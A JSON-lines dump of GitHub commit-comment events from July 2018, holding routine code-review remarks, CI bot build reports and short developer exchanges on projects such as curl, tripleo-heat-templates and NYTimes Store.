{"id":"7939611078","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29646592,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-09T19:24:16Z","updated_at":"2018-07-09T19:24:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T19:24:16Z"}
{"id":"7939611786","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29646593,"position":null,"line":null,"path":null,"commit_id":"ea864e2dc1a978340f58371923543931c6e015bc","created_at":"2018-07-09T19:24:24Z","updated_at":"2018-07-09T19:24:24Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 496](https://ci.hashicorp.engineering/viewLog.html?buildId=102010&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:07:48"}},"created_at":"2018-07-09T19:24:24Z"}
{"id":"7939631101","type":"CommitCommentEvent","actor":{"login":"jay"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":29646629,"position":null,"line":null,"path":null,"commit_id":"8272ec50f02bd5277bdad09a98ddfc8c6d68a979","created_at":"2018-07-09T19:28:30Z","updated_at":"2018-07-09T19:28:30Z","author_association":"MEMBER","body":"Are you sure that's not just you?\r\n\r\n![capture](https://user-images.githubusercontent.com/965580/42471706-b98d5834-838c-11e8-8ef9-4fe3b007a453.PNG)\r\n"}},"created_at":"2018-07-09T19:28:30Z"}
{"id":"7939631108","type":"CommitCommentEvent","actor":{"login":"Hoab"},"repo":{"name":"udacity/ud843_DidYouFeelIt"},"payload":{"comment":{"id":29646630,"position":null,"line":null,"path":null,"commit_id":"0a9e6c2338969c6ad0311f5b2b09ea3895a3f5fa","created_at":"2018-07-09T19:28:30Z","updated_at":"2018-07-09T19:28:30Z","author_association":"NONE","body":"I don't get why the Event \"result\" in the onPostExecute has the same value that the Event \"result\" that we just updated and created in the method doInBackground. In what moment we are giving it that value."}},"created_at":"2018-07-09T19:28:30Z"}
{"id":"7939635757","type":"CommitCommentEvent","actor":{"login":"inteq"},"repo":{"name":"VeracitySI/dnp3"},"payload":{"comment":{"id":29646642,"position":null,"line":null,"path":null,"commit_id":"1bf04ef167c5bbe14504722337b70585c2865d5e","created_at":"2018-07-09T19:29:32Z","updated_at":"2018-07-09T19:29:32Z","author_association":"COLLABORATOR","body":"Mon Jul  9 15:23:35 2018 (1531164215381) : INFO    manager - Starting thread (0)\r\nchannel state change: OPENING\r\nMon Jul  9 15:23:35 2018 (1531164215384) : INFO    server - Listening on: 192.168.1.1:20000\r\nEnter one or more measurement changes then press <enter>\r\nc = counter, b = binary, d = doublebit, a = analog, o = octet string, 'quit' = exit\r\n\r\n"}},"created_at":"2018-07-09T19:29:32Z"}
{"id":"7939635980","type":"CommitCommentEvent","actor":{"login":"bagder"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":29646644,"position":null,"line":null,"path":null,"commit_id":"8272ec50f02bd5277bdad09a98ddfc8c6d68a979","created_at":"2018-07-09T19:29:35Z","updated_at":"2018-07-09T19:29:35Z","author_association":"MEMBER","body":"command line git showed it for me:\r\n~~~diff\r\n-<U+FEFF>#ifndef HEADER_CURL_SETUP_H\r\n+#ifndef HEADER_CURL_SETUP_H\r\n"}},"created_at":"2018-07-09T19:29:35Z"}
{"id":"7939636092","type":"CommitCommentEvent","actor":{"login":"ASBishop"},"repo":{"name":"PranaliDeore/tripleo-heat-templates"},"payload":{"comment":{"id":29646645,"position":86,"line":362,"path":"puppet/services/glance-api.yaml","commit_id":"2c9d711557266049b70c635af78aa75e84c05c6b","created_at":"2018-07-09T19:29:36Z","updated_at":"2018-07-09T19:29:36Z","author_association":"NONE","body":"Just curious, but why the switch to upper-case?\r\n\r\nThis is also where we might consolidate the Netapp NFS and regular NFS settings, but I need to think some more about the situation. I'm still trying to decide if this would be OK.\r\n\r\nif (GlanceNfsShare is set) {\r\n    nfs_share: {get_param: GlanceNfsShare}\r\n} else {\r\n    nfs_share: {get_param: NetappShareLocation}\r\n}\r\n\r\nThis is based on the assumption that the user really should only configure one of those settings, but we'll accept either one as the NFS share they want to mount."}},"created_at":"2018-07-09T19:29:36Z"}
{"id":"7939636291","type":"CommitCommentEvent","actor":{"login":"AndrewPaxie"},"repo":{"name":"rollbear/trompeloeil"},"payload":{"comment":{"id":29646646,"position":115,"line":931,"path":"include/trompeloeil.hpp","commit_id":"e08dfc83cfa83909ac9de7112e58b51f622cd0f0","created_at":"2018-07-09T19:29:39Z","updated_at":"2018-07-09T19:29:39Z","author_association":"COLLABORATOR","body":"Did you mean to leave this code commented out?"}},"created_at":"2018-07-09T19:29:39Z"}
{"id":"7939639252","type":"CommitCommentEvent","actor":{"login":"Xenega"},"repo":{"name":"singularity/singularity"},"payload":{"comment":{"id":29646654,"position":null,"line":null,"path":null,"commit_id":"4f2d4b7515da06c318440a32e9b960266582453b","created_at":"2018-07-09T19:30:17Z","updated_at":"2018-07-09T19:30:17Z","author_association":"MEMBER","body":"Yes."}},"created_at":"2018-07-09T19:30:17Z"}
{"id":"7939644800","type":"CommitCommentEvent","actor":{"login":"MrGaabriel"},"repo":{"name":"BarryBot/Barry"},"payload":{"comment":{"id":29646666,"position":null,"line":null,"path":null,"commit_id":"14fd2c5f41799ca57ecead8fa32aa9ec5ae760fe","created_at":"2018-07-09T19:31:19Z","updated_at":"2018-07-09T19:31:19Z","author_association":"CONTRIBUTOR","body":"Só testando, ignore"}},"created_at":"2018-07-09T19:31:19Z"}
{"id":"7939646141","type":"CommitCommentEvent","actor":{"login":"alphapapa"},"repo":{"name":"mandarg/rerun"},"payload":{"comment":{"id":29646673,"position":null,"line":null,"path":null,"commit_id":"e546b36ac5d9dd2c9a1c6a63ea203a3501283680","created_at":"2018-07-09T19:31:37Z","updated_at":"2018-07-09T19:31:37Z","author_association":"NONE","body":"Unfortunately it was not added to the readme, so I ended up here.  :)"}},"created_at":"2018-07-09T19:31:37Z"}
{"id":"7939647419","type":"CommitCommentEvent","actor":{"login":"ASBishop"},"repo":{"name":"PranaliDeore/tripleo-heat-templates"},"payload":{"comment":{"id":29646677,"position":89,"line":365,"path":"puppet/services/glance-api.yaml","commit_id":"2c9d711557266049b70c635af78aa75e84c05c6b","created_at":"2018-07-09T19:31:54Z","updated_at":"2018-07-09T19:31:54Z","author_association":"NONE","body":"Hmm,  the \"or enable_netapp_copy_offload\" portion doesn't feel right. Conceptually, the whole \"Mount NFS on host\" block of stuff should just be conditional on whether nfs_backend_enabled (regardless of whether it's Netapp NFS or regular NFS)."}},"created_at":"2018-07-09T19:31:54Z"}
{"id":"7939648496","type":"CommitCommentEvent","actor":{"login":"jay"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":29646684,"position":null,"line":null,"path":null,"commit_id":"8272ec50f02bd5277bdad09a98ddfc8c6d68a979","created_at":"2018-07-09T19:32:09Z","updated_at":"2018-07-09T19:32:09Z","author_association":"MEMBER","body":"Yup you got it, I was at the wrong revision."}},"created_at":"2018-07-09T19:32:09Z"}
{"id":"7939650847","type":"CommitCommentEvent","actor":{"login":"coryallen34"},"repo":{"name":"github/site-policy"},"payload":{"comment":{"id":29646688,"position":null,"line":null,"path":null,"commit_id":"c3b94b44e72b79ff990ec5a90e929dc85c86a6e9","created_at":"2018-07-09T19:32:37Z","updated_at":"2018-07-09T19:32:37Z","author_association":"NONE","body":"start id verification if this becomes an huge issue and make sure staff and member are will in the near future have id and aware of this regulations coming shorty in the next few hours."}},"created_at":"2018-07-09T19:32:37Z"}
{"id":"7939654129","type":"CommitCommentEvent","actor":{"login":"MarkusL27"},"repo":{"name":"MarkusL27/Java"},"payload":{"comment":{"id":29646698,"position":null,"line":null,"path":null,"commit_id":"58c1023d2fa6af84e56d9d39f4fe12d907af11a4","created_at":"2018-07-09T19:33:20Z","updated_at":"2018-07-09T19:33:20Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-09T19:33:20Z"}
{"id":"7939659389","type":"CommitCommentEvent","actor":{"login":"mcfaddensoftware"},"repo":{"name":"mcfaddensoftware/jekyll-now"},"payload":{"comment":{"id":29646709,"position":null,"line":null,"path":null,"commit_id":"da13f8d9294dededb628904880808a713c0e9a60","created_at":"2018-07-09T19:34:29Z","updated_at":"2018-07-09T19:34:29Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-09T19:34:29Z"}
{"id":"7939663216","type":"CommitCommentEvent","actor":{"login":"sksrabon"},"repo":{"name":"sksrabon/EmailMarketing"},"payload":{"comment":{"id":29646711,"position":null,"line":null,"path":null,"commit_id":"b6c120ecaa54a8c6d8bebfbb79643d39f17b217f","created_at":"2018-07-09T19:35:20Z","updated_at":"2018-07-09T19:35:20Z","author_association":"OWNER","body":"merged"}},"created_at":"2018-07-09T19:35:20Z"}
{"id":"7939663380","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/oommfc-feedstock"},"payload":{"comment":{"id":29646712,"position":null,"line":null,"path":null,"commit_id":"36483121d6c2ac5561ace4231c339d6b4e8ae5c4","created_at":"2018-07-09T19:35:22Z","updated_at":"2018-07-09T19:35:22Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @davidcortesortuno were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @davidcortesortuno were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T19:35:22Z"}
{"id":"7939665670","type":"CommitCommentEvent","actor":{"login":"linux4life798"},"repo":{"name":"OpenChirp/website"},"payload":{"comment":{"id":29646715,"position":null,"line":null,"path":null,"commit_id":"c5caff330761a67884cd379f360ebcb96ee81dc9","created_at":"2018-07-09T19:35:54Z","updated_at":"2018-07-09T19:35:54Z","author_association":"MEMBER","body":"We should have a flag in the config that determines if this button is shown."}},"created_at":"2018-07-09T19:35:54Z"}
{"id":"7939665884","type":"CommitCommentEvent","actor":{"login":"ASBishop"},"repo":{"name":"PranaliDeore/tripleo-heat-templates"},"payload":{"comment":{"id":29646716,"position":null,"line":null,"path":null,"commit_id":"2c9d711557266049b70c635af78aa75e84c05c6b","created_at":"2018-07-09T19:35:56Z","updated_at":"2018-07-09T19:35:56Z","author_association":"NONE","body":"This is heading in the right direction, but we may need to chat in person to get various ideas to converge on a nice, tidy solution.\r\n\r\nMeanwhile, what sort of manual testing have you done? Style issues aside, does it work?"}},"created_at":"2018-07-09T19:35:56Z"}
{"id":"7939666047","type":"CommitCommentEvent","actor":{"login":"evil-at-wow"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":29646718,"position":null,"line":null,"path":null,"commit_id":"1fdbbea4c7f18a1bbb9fd9fab65dc7339f167722","created_at":"2018-07-09T19:35:58Z","updated_at":"2018-07-09T19:35:58Z","author_association":"CONTRIBUTOR","body":"And if you'd stop using C++ as if we were still living in the 90s, you wouldn't write bugs like this :wink:\r\n\r\nOk, that wasn't really a fair remark - hence the smiley - but allow my suggestion of the day anyway:\r\n* Get rid of the silly sentinel value in the static array (that last 0), it doesn't really serve any useful purpose (except perhaps \"convenience\" while looping over the array the way the code is written).\r\n* Replace the loop by something like this:\r\n\r\n```\r\nfor (uint32 spell : allSpellList)\r\n{\r\n    if (m_session->GetPlayer()->HasSpell(spell))\r\n        continue;\r\n\r\n    SpellEntry const* spellInfo = sSpellTemplate.LookupEntry<SpellEntry>(spell);\r\n    if (!spellInfo || !SpellMgr::IsSpellValid(spellInfo, m_session->GetPlayer()))\r\n    {\r\n        PSendSysMessage(LANG_COMMAND_SPELL_BROKEN, spell);\r\n        continue;\r\n     }\r\n\r\n     m_session->GetPlayer()->learnSpell(spell, false);\r\n}\r\n```\r\n\r\nNo need for a strange while loop with sentinel value, no need for an index variable that introduces subtle bugs when you forget to increment or update it, etc. What's not to like? :smile:\r\n\r\nI realize that this code was originally written with a loop like this because the array of spells was an array with const char*, etc, so I don't really blame you for trying to keep it similar and minimize risk. Sometimes refactoring can use that little extra step though to really make it useful. I admit that's often a (difficult) trade-off to make, but I'd do it in this case."}},"created_at":"2018-07-09T19:35:58Z"}
{"id":"7939666496","type":"CommitCommentEvent","actor":{"login":"ASBishop"},"repo":{"name":"PranaliDeore/tripleo-heat-templates"},"payload":{"comment":{"id":29646720,"position":26,"line":320,"path":"puppet/services/glance-api.yaml","commit_id":"2c9d711557266049b70c635af78aa75e84c05c6b","created_at":"2018-07-09T19:36:04Z","updated_at":"2018-07-09T19:36:04Z","author_association":"NONE","body":"There's that .conf extension again :-/"}},"created_at":"2018-07-09T19:36:04Z"}
{"id":"7939667758","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29646727,"position":null,"line":null,"path":null,"commit_id":"363cb07cbc952e154f65173c9eb5455e4107dc41","created_at":"2018-07-09T19:36:21Z","updated_at":"2018-07-09T19:36:21Z","author_association":"COLLABORATOR","body":"Ok. I think it is better to open a separate issue for myself. The fact is that the new stable that I modified is more correct than the old stable which is in the current master branch, because those symbols indeed not exists in the document. The key problem is the stable version is not consistent with the manual version. Even we want to modify them, we have to start modifying from where it is implemented in some equation or sentences. So I think after this branch is merged in, I will start to compare the manual and stable to make small changes every time. Do you think this solution is Ok? @JacquesCarette @smiths "}},"created_at":"2018-07-09T19:36:21Z"}
{"id":"7939669816","type":"CommitCommentEvent","actor":{"login":"harold"},"repo":{"name":"Franiac/TwitchLeecher"},"payload":{"comment":{"id":29646734,"position":1,"line":1,"path":"README.md","commit_id":"c92c864a6f1e2c0f23e9e3142fc806ac101a6b45","created_at":"2018-07-09T19:36:49Z","updated_at":"2018-07-09T19:36:49Z","author_association":"NONE","body":"Ha! Just found and tried this for the first time today. I may never visit the actual website ever again. 😈 \r\n\r\nThanks for this."}},"created_at":"2018-07-09T19:36:49Z"}
{"id":"7939673122","type":"CommitCommentEvent","actor":{"login":"ibarroci"},"repo":{"name":"twstokes/door_detect"},"payload":{"comment":{"id":29646743,"position":null,"line":null,"path":null,"commit_id":"23a2f3026000163e159fba4d9e10fb2ac535e570","created_at":"2018-07-09T19:37:33Z","updated_at":"2018-07-09T19:37:33Z","author_association":"NONE","body":"Hey twstokes, I am young high school student currently getting my foot in the door to programming. On doing some research on OpenCV I came across this project on github. I don't have a network camera but was hoping to test this out on my webcam. After reviewing the code, I've tried to change the source of the video in example.py but haven't been successful. Do you have any code or suggestions on how to change the source? Like I mentioned earlier, I am new into programming so simple explanations would be great \r\n"}},"created_at":"2018-07-09T19:37:33Z"}
{"id":"7939678238","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"mrNkravchenko/yii2"},"payload":{"comment":{"id":29646757,"position":9,"line":125,"path":"controllers/AccessController.php","commit_id":"53beb5c145941b26269305fc14ddc6a9bb44ab5c","created_at":"2018-07-09T19:38:42Z","updated_at":"2018-07-09T19:38:42Z","author_association":"NONE","body":"Лучше наоборот выносить из if-a такое больше условие - читается гораздо легче."}},"created_at":"2018-07-09T19:38:42Z"}
{"id":"7939679227","type":"CommitCommentEvent","actor":{"login":"99fabio99"},"repo":{"name":"99fabio99/patrimonio"},"payload":{"comment":{"id":29646759,"position":null,"line":null,"path":null,"commit_id":"f00439c9abd6e8041132a8bb8ad064a219bb2ea7","created_at":"2018-07-09T19:38:55Z","updated_at":"2018-07-09T19:38:55Z","author_association":"OWNER","body":"também foi acrescentado o método de listagem de Categorias e Empresas, em que são listadas todas as categorias ou empresas contidas no banco de dados. "}},"created_at":"2018-07-09T19:38:55Z"}
{"id":"7939679900","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"mrNkravchenko/yii2"},"payload":{"comment":{"id":29646762,"position":6,"line":26,"path":"controllers/NoteController.php","commit_id":"53beb5c145941b26269305fc14ddc6a9bb44ab5c","created_at":"2018-07-09T19:39:05Z","updated_at":"2018-07-09T19:39:05Z","author_association":"NONE","body":"комментарии лучше удалять из коммита"}},"created_at":"2018-07-09T19:39:05Z"}
{"id":"7939682886","type":"CommitCommentEvent","actor":{"login":"Dann325"},"repo":{"name":"Dann325/AtomicAssault"},"payload":{"comment":{"id":29646765,"position":null,"line":null,"path":null,"commit_id":"97eaf3765d2aa79601058109827967f713d20916","created_at":"2018-07-09T19:39:46Z","updated_at":"2018-07-09T19:39:46Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Optional Priority Issues](https://trello.com/c/S8gOe6OM/2-optional-priority-issues)"}},"created_at":"2018-07-09T19:39:46Z"}
{"id":"7939683131","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"mrNkravchenko/yii2"},"payload":{"comment":{"id":29646766,"position":25,"line":119,"path":"controllers/NoteController.php","commit_id":"53beb5c145941b26269305fc14ddc6a9bb44ab5c","created_at":"2018-07-09T19:39:49Z","updated_at":"2018-07-09T19:39:49Z","author_association":"NONE","body":"Возможно, пропустил отладочный var_dump при коммите"}},"created_at":"2018-07-09T19:39:49Z"}
{"id":"7939683565","type":"CommitCommentEvent","actor":{"login":"MarcelRaad"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":29646768,"position":null,"line":null,"path":null,"commit_id":"8272ec50f02bd5277bdad09a98ddfc8c6d68a979","created_at":"2018-07-09T19:39:55Z","updated_at":"2018-07-09T19:39:55Z","author_association":"MEMBER","body":"Sorry, and thanks for fixing! Strange, no idea how that could happen. Native Windows tools (e.g. Notepad) sometimes do that if the file contains non-ASCII characters, but I can't find any..."}},"created_at":"2018-07-09T19:39:55Z"}
{"id":"7939685920","type":"CommitCommentEvent","actor":{"login":"rnalrd"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29646772,"position":null,"line":null,"path":null,"commit_id":"02b38ef8a4abb0abc41a202a359c6d0aa2a925e7","created_at":"2018-07-09T19:40:26Z","updated_at":"2018-07-09T19:40:26Z","author_association":"CONTRIBUTOR","body":"> @rnalrd Why? I was planning to use this on a RPi printing server build around qz.io...\r\n\r\nhttps://git.alpinelinux.org/cgit/aports/commit/?id=ef8c2edb9afc72ea79ba1cf9886abfa12ff9b89b"}},"created_at":"2018-07-09T19:40:26Z"}
{"id":"7939686455","type":"CommitCommentEvent","actor":{"login":"Dann325"},"repo":{"name":"Dann325/AtomicAssault"},"payload":{"comment":{"id":29646773,"position":null,"line":null,"path":null,"commit_id":"e5e068f21f6b4769f5e45503ce4177f0f460914c","created_at":"2018-07-09T19:40:34Z","updated_at":"2018-07-09T19:40:34Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [0.18](https://trello.com/c/Uue6kZ9y/5-018)"}},"created_at":"2018-07-09T19:40:34Z"}
{"id":"7939686666","type":"CommitCommentEvent","actor":{"login":"Dann325"},"repo":{"name":"Dann325/AtomicAssault"},"payload":{"comment":{"id":29646774,"position":null,"line":null,"path":null,"commit_id":"e5e068f21f6b4769f5e45503ce4177f0f460914c","created_at":"2018-07-09T19:40:37Z","updated_at":"2018-07-09T19:40:37Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [0.18](https://trello.com/c/Uue6kZ9y/5-018)"}},"created_at":"2018-07-09T19:40:37Z"}
{"id":"7939688576","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"mrNkravchenko/yii2"},"payload":{"comment":{"id":29646782,"position":39,"line":162,"path":"controllers/NoteController.php","commit_id":"53beb5c145941b26269305fc14ddc6a9bb44ab5c","created_at":"2018-07-09T19:41:00Z","updated_at":"2018-07-09T19:41:00Z","author_association":"NONE","body":"Прекрасно! Логгирование ошибок это отличная практика и ужасная боль если его нет)"}},"created_at":"2018-07-09T19:41:00Z"}
{"id":"7939689267","type":"CommitCommentEvent","actor":{"login":"oronibrian"},"repo":{"name":"techtenant/OSMI-Mental-Health-in-Tech-Survey"},"payload":{"comment":{"id":29646787,"position":null,"line":null,"path":null,"commit_id":"bd0bc292e2075cd64e5d714696a4799822d5147c","created_at":"2018-07-09T19:41:09Z","updated_at":"2018-07-09T19:41:09Z","author_association":"COLLABORATOR","body":"fixed error on the gender but still inalleta zingine.not 3 only"}},"created_at":"2018-07-09T19:41:09Z"}
{"id":"7939689307","type":"CommitCommentEvent","actor":{"login":"rollbear"},"repo":{"name":"rollbear/trompeloeil"},"payload":{"comment":{"id":29646788,"position":115,"line":931,"path":"include/trompeloeil.hpp","commit_id":"e08dfc83cfa83909ac9de7112e58b51f622cd0f0","created_at":"2018-07-09T19:41:09Z","updated_at":"2018-07-09T19:41:09Z","author_association":"OWNER","body":"No. That's an accident. I originally had it there, but not all compilers accepted. I tried commenting out to see if all compilers accepted (they did) and forgot to remove. Feel free to remove it."}},"created_at":"2018-07-09T19:41:09Z"}
{"id":"7939693538","type":"CommitCommentEvent","actor":{"login":"drcraig007"},"repo":{"name":"appcoda/Print2PDF"},"payload":{"comment":{"id":29646793,"position":4,"line":25,"path":"Print2PDF/CustomPrintPageRenderer.swift","commit_id":"0928bd55dfe9087ee2503bf0107d0eb25bd5ccb1","created_at":"2018-07-09T19:42:04Z","updated_at":"2018-07-09T19:42:04Z","author_association":"NONE","body":"This fails in Swift 4 - haven't found out how to do it in Swift 4 either!\r\n"}},"created_at":"2018-07-09T19:42:04Z"}
{"id":"7939699186","type":"CommitCommentEvent","actor":{"login":"pavlospt"},"repo":{"name":"NYTimes/Store"},"payload":{"comment":{"id":29646803,"position":16,"line":16,"path":"filesystem/src/main/java/com/nytimes/android/external/fs3/Util.kt","commit_id":"ea39b8ee092a0fb82a4e9db2af7bb5db0536b544","created_at":"2018-07-09T19:43:19Z","updated_at":"2018-07-09T19:43:19Z","author_association":"CONTRIBUTOR","body":"@brianPlummer I would suggest checking this one again. It's a usual conversion of Java to Kotlin thing. Kotlin still has `split()` :) It would make it clearer I think: `path.split(delim.toRegex())` and it returns a `List<String>` :)"}},"created_at":"2018-07-09T19:43:19Z"}
{"id":"7939699741","type":"CommitCommentEvent","actor":{"login":"dominictarr"},"repo":{"name":"dominictarr/level-sublevel"},"payload":{"comment":{"id":29646805,"position":null,"line":null,"path":null,"commit_id":"9d0f164d85b03fcab0f7b3587251d2984a76ce93","created_at":"2018-07-09T19:43:26Z","updated_at":"2018-07-09T19:43:26Z","author_association":"OWNER","body":"fixed in 6.6.4"}},"created_at":"2018-07-09T19:43:26Z"}
{"id":"7939702436","type":"CommitCommentEvent","actor":{"login":"pavlospt"},"repo":{"name":"NYTimes/Store"},"payload":{"comment":{"id":29646810,"position":62,"line":62,"path":"filesystem/src/main/java/com/nytimes/android/external/fs3/Util.kt","commit_id":"ea39b8ee092a0fb82a4e9db2af7bb5db0536b544","created_at":"2018-07-09T19:44:01Z","updated_at":"2018-07-09T19:44:01Z","author_association":"CONTRIBUTOR","body":"Might want to move the comment above `parent` assignment to make it more readable :)"}},"created_at":"2018-07-09T19:44:01Z"}
{"id":"7939702691","type":"CommitCommentEvent","actor":{"login":"rom1504"},"repo":{"name":"PrismarineJS/flying-squid"},"payload":{"comment":{"id":29646811,"position":5,"line":18,"path":"src/lib/plugins/placeBlock.js","commit_id":"453669f22a815cc73598f1b73937df6443297ffa","created_at":"2018-07-09T19:44:05Z","updated_at":"2018-07-09T19:44:05Z","author_association":"MEMBER","body":"That line is needed, add it back"}},"created_at":"2018-07-09T19:44:05Z"}
{"id":"7939708354","type":"CommitCommentEvent","actor":{"login":"gvanem"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":29646818,"position":null,"line":null,"path":null,"commit_id":"8272ec50f02bd5277bdad09a98ddfc8c6d68a979","created_at":"2018-07-09T19:45:17Z","updated_at":"2018-07-09T19:45:17Z","author_association":"MEMBER","body":"> ...  if the file contains non-ASCII characters, but I can't find any...\r\n\r\nMaybe due to the apostrophe in `doesn't` at line 220? I saw the same UTF-8 code at that line."}},"created_at":"2018-07-09T19:45:17Z"}
{"id":"7939710101","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29646824,"position":null,"line":null,"path":null,"commit_id":"fedcd048c78742ec7796f3beca1fae2028a82a51","created_at":"2018-07-09T19:45:39Z","updated_at":"2018-07-09T19:45:39Z","author_association":"OWNER","body":"Looks good."}},"created_at":"2018-07-09T19:45:39Z"}
{"id":"7939710773","type":"CommitCommentEvent","actor":{"login":"jay"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":29646826,"position":null,"line":null,"path":null,"commit_id":"8272ec50f02bd5277bdad09a98ddfc8c6d68a979","created_at":"2018-07-09T19:45:47Z","updated_at":"2018-07-09T19:45:47Z","author_association":"MEMBER","body":"Sometimes Visual Studio can do it as well but I forget why, probably same reason."}},"created_at":"2018-07-09T19:45:47Z"}
{"id":"7939712923","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29646829,"position":null,"line":null,"path":null,"commit_id":"ea46cd551d587675dab7170ad64aea51fcbaeff6","created_at":"2018-07-09T19:46:13Z","updated_at":"2018-07-09T19:46:13Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-34](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-34).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-34-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-09T19:46:13Z"}
{"id":"7939712997","type":"CommitCommentEvent","actor":{"login":"clompsy"},"repo":{"name":"clompsy/worldmap-panel"},"payload":{"comment":{"id":29646830,"position":null,"line":null,"path":null,"commit_id":"bec57527b161e27116da60bc811cc1b1b54f2520","created_at":"2018-07-09T19:46:14Z","updated_at":"2018-07-09T19:46:14Z","author_association":"OWNER","body":"Fixes #149"}},"created_at":"2018-07-09T19:46:14Z"}
{"id":"7939718757","type":"CommitCommentEvent","actor":{"login":"kyzyltanatuva"},"repo":{"name":"kyzyltanatuva/hello-world"},"payload":{"comment":{"id":29646840,"position":null,"line":null,"path":null,"commit_id":"6e52e2d21b33c888ee2c6ae33d8545a6437fdde2","created_at":"2018-07-09T19:47:27Z","updated_at":"2018-07-09T19:47:27Z","author_association":"OWNER","body":"This is a test comment### \r\n\r\n> [`_****_`](\r\n\r\n- \r\n\r\n- [ ] @ #1. url\r\n\r\n)"}},"created_at":"2018-07-09T19:47:27Z"}
{"id":"7939719790","type":"CommitCommentEvent","actor":{"login":"kyzyltanatuva"},"repo":{"name":"kyzyltanatuva/hello-world"},"payload":{"comment":{"id":29646845,"position":null,"line":null,"path":null,"commit_id":"6e52e2d21b33c888ee2c6ae33d8545a6437fdde2","created_at":"2018-07-09T19:47:41Z","updated_at":"2018-07-09T19:47:41Z","author_association":"OWNER","body":"Now what?\r\n"}},"created_at":"2018-07-09T19:47:41Z"}
{"id":"7939720672","type":"CommitCommentEvent","actor":{"login":"DanielRuf"},"repo":{"name":"DSchau/gatsby-blog-starter-kit"},"payload":{"comment":{"id":29646848,"position":null,"line":null,"path":null,"commit_id":"a7c99779390eba9db10d6f1255e6f90beeb0b444","created_at":"2018-07-09T19:47:52Z","updated_at":"2018-07-09T19:47:52Z","author_association":"CONTRIBUTOR","body":"I guess we have to trigger a new build?"}},"created_at":"2018-07-09T19:47:52Z"}
{"id":"7939720708","type":"CommitCommentEvent","actor":{"login":"pavlospt"},"repo":{"name":"NYTimes/Store"},"payload":{"comment":{"id":29646849,"position":31,"line":31,"path":"filesystem/src/main/java/com/nytimes/android/external/fs3/SourcePersisterFactory.kt","commit_id":"ea39b8ee092a0fb82a4e9db2af7bb5db0536b544","created_at":"2018-07-09T19:47:53Z","updated_at":"2018-07-09T19:47:53Z","author_association":"CONTRIBUTOR","body":"Nit: not needed null-check. Kotlin will throw if `root` is null."}},"created_at":"2018-07-09T19:47:53Z"}
{"id":"7939721135","type":"CommitCommentEvent","actor":{"login":"pavlospt"},"repo":{"name":"NYTimes/Store"},"payload":{"comment":{"id":29646850,"position":58,"line":58,"path":"filesystem/src/main/java/com/nytimes/android/external/fs3/SourcePersisterFactory.kt","commit_id":"ea39b8ee092a0fb82a4e9db2af7bb5db0536b544","created_at":"2018-07-09T19:47:58Z","updated_at":"2018-07-09T19:47:58Z","author_association":"CONTRIBUTOR","body":"Nit: not needed null-check. Kotlin will throw if `root` is null."}},"created_at":"2018-07-09T19:47:58Z"}
